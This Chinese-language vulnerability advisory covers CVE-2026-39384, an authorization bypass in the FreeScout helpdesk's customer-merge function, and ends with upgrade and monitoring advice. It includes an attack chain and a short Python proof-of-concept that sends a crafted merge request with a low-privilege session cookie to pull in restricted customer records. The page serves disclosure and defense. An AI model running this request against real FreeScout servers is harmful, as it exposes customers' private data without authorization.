CVE-2026-39384 CVSS 7.6 高危

CVE-2026-39384 FreeScout权限绕过漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39384

漏洞类型

权限绕过

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FreeScout

漏洞概述

FreeScout是基于Laravel的免费帮助台系统。在1.8.212版本之前，系统在合并客户时未正确处理`limit_user_customer_visibility`参数。这导致低权限用户可绕过可见性限制，合并并访问受限客户数据。该漏洞已在1.8.212版本中修复。

技术细节

FreeScout是一个基于Laravel框架构建的帮助台系统。该漏洞源于其业务逻辑在处理“合并客户”功能时存在缺陷。具体而言，系统配置中存在`limit_user_customer_visibility`参数，旨在限制普通用户只能查看特定的客户数据。然而，在1.8.212版本之前的代码逻辑中，当用户执行合并操作时，后端未正确校验该参数以及用户对目标客户的访问权限。攻击者利用此漏洞，只需具备低权限账户（PR:L），即可通过网络向服务器发送恶意的合并请求。通过将受限客户（本无权查看）合并到自身有权限的客户记录中，攻击者能够绕过访问控制机制，读取敏感客户信息（机密性影响），并可能导致客户数据被错误关联或篡改（完整性影响）。这本质上是一个因服务器端安全检查缺失导致的越权漏洞。

攻击链分析

STEP 1

侦察阶段

攻击者确认目标系统使用FreeScout，且版本低于1.8.212。

STEP 2

获取凭证

攻击者注册或获取一个低权限用户账户（PR:L）。

STEP 3

漏洞利用

攻击者向服务器发送合并客户的请求，试图将受限的客户ID合并到其有权访问的客户ID中。

STEP 4

数据访问

由于系统忽略了可见性限制，合并成功，攻击者获得了受限客户数据的访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL example
target_url = "https://example.com/customers/merge"

# Attacker's session cookie (Low privilege user)
cookies = {
    "freescout_session": "attacker_session_cookie_here"
}

# Payload: Merge a restricted customer (id=999) into an accessible one (id=1)
# The vulnerability is that 'limit_user_customer_visibility' is ignored
payload = {
    "merge_from": 999,  # Restricted customer ID
    "merge_into": 1     # Customer ID accessible to attacker
}

try:
    response = requests.post(target_url, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("[+] Potential exploitation successful. Customer merged.")
    else:
        print("[-] Exploit failed or endpoint changed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

FreeScout < 1.8.212

防御指南

临时缓解措施

建议立即将FreeScout升级至1.8.212或更高版本以修补此漏洞。如果暂时无法升级，管理员应严格限制低权限用户的账户权限，并密切监控系统日志，检查是否存在异常的客户合并记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表